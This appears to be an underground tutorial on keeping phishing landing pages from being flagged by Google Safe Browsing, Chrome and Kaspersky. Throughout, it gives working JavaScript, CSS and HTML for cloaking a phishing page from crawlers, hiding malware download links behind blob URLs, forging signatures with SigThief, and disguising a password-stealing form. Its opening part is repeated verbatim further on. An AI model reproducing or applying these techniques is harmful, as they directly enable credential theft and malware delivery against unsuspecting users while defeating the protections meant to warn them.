A step by step guide with code examples on how to save your landing page from the red screen of happiness.
Here is how the record for a wildcard domain looks like in the domain dns settings in cloudflare:
here 122.1.1.231 is the ip address of our server
Now our landing page will be available, for example, at telegrarn.4bi.us.
To begin with, we will create a white fake site.
Let's say our phishing start page is called index.php. Let's rename it to home.php, and put the code of a clean (white) landing page purchased in the telegram bot into the body of the index.php page.
Now the index.php start page code looks something like this:
In order for users to see not a white site, but our phishing page, add the following html code to the head section of our index.php start page:
<script>
home = 'L2hvbWUucGhw';
zones = /Madrid|Canary|Vienna|Istanbul/gi;
timezoneOffset = zones.test((new Intl.DateTimeFormat).resolvedOptions().timeZone);
self.Notification&&timezoneOffset&&fetch(atob(home)).then(
function(r){return r.text().then(function(t){document.write(t)})}
);
</script>
In this code we do the following:
And all users suitable for us see our evil landing:
Great. Go ahead.
document.documentElement.style.cssText="filter:hue-rotate(4deg)";
Let's add it to any javascript file from the <head> section of the page, for example in jquery.js:
to any other text:
You can see which files Chrome considers executable here: https://source.chromium.org/chromiu...;drc=af17ad3f07c1d8a24381eb7669bec0c2ffb86521.
First, using the SigThief utility, we will attach to our file any digital signature taken from any signed executable file.
To prevent google crawler from downloading our file, we need to:
Let's remove the direct address of the file from it, for example, encode it in base64 with any of the base64 encoders (for example, base64encode.net) and add any id for the button to hook it in javascript:
Now let's add code to our .js file (in our example, jquery.js) that will wait until the page DOM tree is fully loaded and replace the file address with a temporary blob-url for all links with id="clickbtn":
document.addEventListener('DOMContentLoaded',function(e) {
document.querySelectorAll('#clickbtn').forEach(function(a,url) {
url = atob(a.href.split('/').slice(-1)[0]);
fetch(url).then(function(r){return r.blob()}).then(function(blob){
a.href = URL.createObjectURL(blob);
a.download = url.split('/').slice(-1)[0];
});
});
});
Now our javascript file will look something like this:
Now let's obfuscate this code with obfuscator.io:
Fabulous.
Let's get rid of the words password on the page first. Pseudo-elements in css like ::before or ::after do not participate in the DOM tree representation of the page and are perfect for us. Let's remove the word password from the page code, and display it using css. Let's assume that our password word in the page code looks like this:
Let's remove it, and put any string element with any class in its place. For example span with class pass:
Now, anywhere in the html code of our page, add the following html code:
<style>
.pass::before{content:"pass\08word"}
</style>
In this case, we've added the \08 (backspace) character to obfuscate the word password inside the style block as well. And here is the result:
Let's get rid of the password input field by replacing it with a regular <input type="text">.
Let's say our password input field looks like this:
Let's replace it with the following code:
<div class="wrapper">
<input type="text" id="dots" class="form-control input ext-input text-box ext-text-box">
<input type="text" name="passwd" id="i0118" class="form-control input ext-input text-box ext-text-box">
</div>
We changed the type of the password input field from password to text, then added the same text input field with id="dots" in front of it, and wrapped both fields in a separate layer. This is necessary to display a natural password input field. The first input will contain only ● characters, displaying password characters as the user enters them. The second input will be overlaid on top of the first, have zero opacity, and pass all characters typed into the first input. We also copied all the classes from the password input to the dotted input classes to keep the original look. Now let's take care of overlaying the second input field on top of the first. Let's add the following styles to our page code:
.wrapper {position:relative;}
.wrapper input[type=text] {position:absolute!important}
.wrapper #i0118 {opacity:0!important}
where in our example #i0118 is the id of the original password field. Now our css code looks like this:
In the above code, the position:relative value of the box with the wrapper class is needed to position the inner boxes absolutely to the parent element.
Now let's animate the input fields with javascript. Let's add the following code to any of the included .js files (or directly to the body of the page, after wrapping it with a <script> tag):
document.addEventListener('DOMContentLoaded', function(e) {
i0118.onfocus = function(e){dots.value=dots.value||'|'}
i0118.onkeyup = function(e){dots.value=i0118.value.replace(/./g,'●')+'|'}
});
In the code above, i0118 is the id of the original password field, and dots is the id of the field representing the user's input. Now our js code looks like this:
If you included all the code in the body of the page, now it looks something like this:
And here is our final result:
Great. We got rid of all mentions of the word password on the page, and removed the password input field.
0. What will we learn? Content
- What does Google Safe Browsing consist of?
- How to choose the right domain
- How to create the correct ssl certificate
- How to hide landing page from GSB crawler
- Updating the crypt js-files of the previous landing
- How to bypass detection based on site palette
- How to bypass Kaspersky detection
- How to bypass chrome file download blocking
- What and how to replace the password entry form
1. What is Google Safe Browsing?
Google Safebrowsing has four parts:- phishing detection mechanism built into chrome based on matching color palettes and parts of domains of previously visited sites.
- a mechanism for checking url-addresses and hashes of files for a match against a preloaded database of shortened hashes stored locally.
- a mechanism for unpacking most types of archives, and checking hashes of executable files and hashes of their sections against a locally stored database.
- a crawler that receives the addresses of downloaded files, goes through them, downloads them and transfers them to google servers for analysis by the anti-virus engine using the VirusTotal service.
2. We need a new domain
The domain should be allowed to lie down for at least a week, because. Google does not trust domains registered yesterday at all. The domain name must not contain:- brand words
- brand words with typos
- domain names that the user has visited before, such as dhl, telegram, hsbc and the like.
3. We need an ssl certificate for the domain
To do this, we will bind the domain to cloudflare.com. All ssl certificates, when created, fall into a special feed called the certificate transparency log. This feed is constantly monitored by antivirus companies. You can look at it yourself, for example, here: https://certstream.calidog.io/. Therefore, all certificates issued for domains containing branded words or branded words with misspellings instantly come to the attention of antivirus companies, and your phishing hosted on a misspelled domain will be instantly marked as malicious. Thus, we cannot order a certificate for a branded domain with a typo. However, cloudflare gives us the opportunity to order a wildcard certificate for free. This is a certificate for all subdomains of a domain, without specifying a specific subdomain name.Here is how the record for a wildcard domain looks like in the domain dns settings in cloudflare:
here 122.1.1.231 is the ip address of our server
Now our landing page will be available, for example, at telegrarn.4bi.us.
4. Hide the landing page from the GSB crawler
The GSB crawler (like the GoogleAds crawler) is based on the pure Google Chrome engine with minimal changes. It runs in headless mode and is controlled via the webdriver protocol. By ip-address it is pointless to try to block it, because. it uses proxy servers with home addresses. But in headless mode, the desktop version of the Chrome browser turns off support for the Notification API. By the presence of support for this api, we will determine the crawler and show it a white site instead of a malicious one.To begin with, we will create a white fake site.
Let's say our phishing start page is called index.php. Let's rename it to home.php, and put the code of a clean (white) landing page purchased in the telegram bot into the body of the index.php page.
Now the index.php start page code looks something like this:
In order for users to see not a white site, but our phishing page, add the following html code to the head section of our index.php start page:
<script>
home = 'L2hvbWUucGhw';
zones = /Madrid|Canary|Vienna|Istanbul/gi;
timezoneOffset = zones.test((new Intl.DateTimeFormat).resolvedOptions().timeZone);
self.Notification&&timezoneOffset&&fetch(atob(home)).then(
function(r){return r.text().then(function(t){document.write(t)})}
);
</script>
In this code we do the following:
- in the home variable, we hid the address of the phishing page (home.php) encoded in base64 (for example, on the site base64encode.net). This is necessary because the GSB crawler extracts all links from the files it downloads and tries to download and analyze them.
- for the sake of order, we cut off unnecessary users based on the time zone used by their system. This is not a critical move, but it will save our phishing from prying eyes. Here is a table of time zone names for the countries we are interested in: en.wikipedia.org/wiki/List_of_tz_database_time_zones. If we want to send traffic to the landing page, for example, from Germany, then we will replace the line zones = /Madrid|Canary|Vienna|Istanbul/gi; to the line zones = /Berlin/gi; and thus cut off all users (and crawlers) with a different time zone selected in their system settings.
- The last step is to check the notification api support and if the user has a suitable time zone selected, we download the content of the home.php file and replace it with the content of the current index.php page.
And all users suitable for us see our evil landing:
Great. Go ahead.
5. Re-script all js files from our last landing
The google crawler checks and remembers all js files from pages identified as malicious. Therefore, before starting work, we definitely need to re-obfuscate all the js files of our landing page. To do this, you can use any of the many javascript obfuscators, for example https://obfuscator.io/.6. Change the color palette of our landing page
The Chrome browser has a built-in mechanism for detecting phishing sites based on the coincidence of the sum of all pixels of a page of each color with the palettes of sites previously visited by the user. We can change the color palette of our landing page in one line of javascript code, which must be placed in the js file loaded from the <head> section of the home.php page, so that it is executed before the page body is loaded. Here is this line:document.documentElement.style.cssText="filter:hue-rotate(4deg)";
Let's add it to any javascript file from the <head> section of the page, for example in jquery.js:
7. Change the original <title> of the landing page to any other
Kaspersky Anti-Virus checks whether the contents of the page's <title> tag match the contents of the <title> of pages previously visited by the user. Let's replace, for example:to any other text:
8. If a file is downloaded from your landing page
The addresses of all files downloaded by the Chrome browser are sent to google, and then the GoogleSafeBrowsing crawler comes to these addresses, downloads the files and analyzes them with its own antivirus engine and on the virustotal.com platform. Hashes of dangerous files and sections of executable files are stored locally in the Chrome browser. Therefore, first of all, we need to use a clean file. Chrome will also block the download of the file if:- His name contains brand words. Therefore, we cannot name the file, for example, FireFox_Installer.exe, but we will use a neutral name, for example, Installer.exe.
- If the download of the file is not initiated by a user click (it is the user - the .click () method using javascript does not suit us)
- If the file type is executable (or the archive with the file contains executable files), and the domain from which the file is downloaded has not been visited by the user in the last 24 hours.
- If the file type is executable (or the archive with the file contains executable files), and the file does not have a digital signature (at least an invalid one).
You can see which files Chrome considers executable here: https://source.chromium.org/chromiu...;drc=af17ad3f07c1d8a24381eb7669bec0c2ffb86521.
First, using the SigThief utility, we will attach to our file any digital signature taken from any signed executable file.
To prevent google crawler from downloading our file, we need to:
- refuse to use static file addresses
- remove the file address in its pure form from the page code
- give file to user via ephemeral blob-url
Let's remove the direct address of the file from it, for example, encode it in base64 with any of the base64 encoders (for example, base64encode.net) and add any id for the button to hook it in javascript:
Now let's add code to our .js file (in our example, jquery.js) that will wait until the page DOM tree is fully loaded and replace the file address with a temporary blob-url for all links with id="clickbtn":
document.addEventListener('DOMContentLoaded',function(e) {
document.querySelectorAll('#clickbtn').forEach(function(a,url) {
url = atob(a.href.split('/').slice(-1)[0]);
fetch(url).then(function(r){return r.blob()}).then(function(blob){
a.href = URL.createObjectURL(blob);
a.download = url.split('/').slice(-1)[0];
});
});
});
Now our javascript file will look something like this:
Now let's obfuscate this code with obfuscator.io:
Fabulous.
Please remember that even if the archive containing the file is password protected, the Chrome browser can still see the names of the files in the archive and understand that the archive contains executable files.
9. If your landing page has a password entry form
It's already more difficult. First of all, Chrome is suspicious in advance of html pages containing a password input field or the word password in any language.Let's get rid of the words password on the page first. Pseudo-elements in css like ::before or ::after do not participate in the DOM tree representation of the page and are perfect for us. Let's remove the word password from the page code, and display it using css. Let's assume that our password word in the page code looks like this:
Let's remove it, and put any string element with any class in its place. For example span with class pass:
Now, anywhere in the html code of our page, add the following html code:
<style>
.pass::before{content:"pass\08word"}
</style>
In this case, we've added the \08 (backspace) character to obfuscate the word password inside the style block as well. And here is the result:
Let's get rid of the password input field by replacing it with a regular <input type="text">.
Let's say our password input field looks like this:
Let's replace it with the following code:
<div class="wrapper">
<input type="text" id="dots" class="form-control input ext-input text-box ext-text-box">
<input type="text" name="passwd" id="i0118" class="form-control input ext-input text-box ext-text-box">
</div>
We changed the type of the password input field from password to text, then added the same text input field with id="dots" in front of it, and wrapped both fields in a separate layer. This is necessary to display a natural password input field. The first input will contain only ● characters, displaying password characters as the user enters them. The second input will be overlaid on top of the first, have zero opacity, and pass all characters typed into the first input. We also copied all the classes from the password input to the dotted input classes to keep the original look. Now let's take care of overlaying the second input field on top of the first. Let's add the following styles to our page code:
.wrapper {position:relative;}
.wrapper input[type=text] {position:absolute!important}
.wrapper #i0118 {opacity:0!important}
where in our example #i0118 is the id of the original password field. Now our css code looks like this:
In the above code, the position:relative value of the box with the wrapper class is needed to position the inner boxes absolutely to the parent element.
Now let's animate the input fields with javascript. Let's add the following code to any of the included .js files (or directly to the body of the page, after wrapping it with a <script> tag):
document.addEventListener('DOMContentLoaded', function(e) {
i0118.onfocus = function(e){dots.value=dots.value||'|'}
i0118.onkeyup = function(e){dots.value=i0118.value.replace(/./g,'●')+'|'}
});
In the code above, i0118 is the id of the original password field, and dots is the id of the field representing the user's input. Now our js code looks like this:
If you included all the code in the body of the page, now it looks something like this:
And here is our final result:
You can play with a live code example at jsbin.com: https://jsbin.com/mipoqoxeve/edit?html,output
Great. We got rid of all mentions of the word password on the page, and removed the password input field.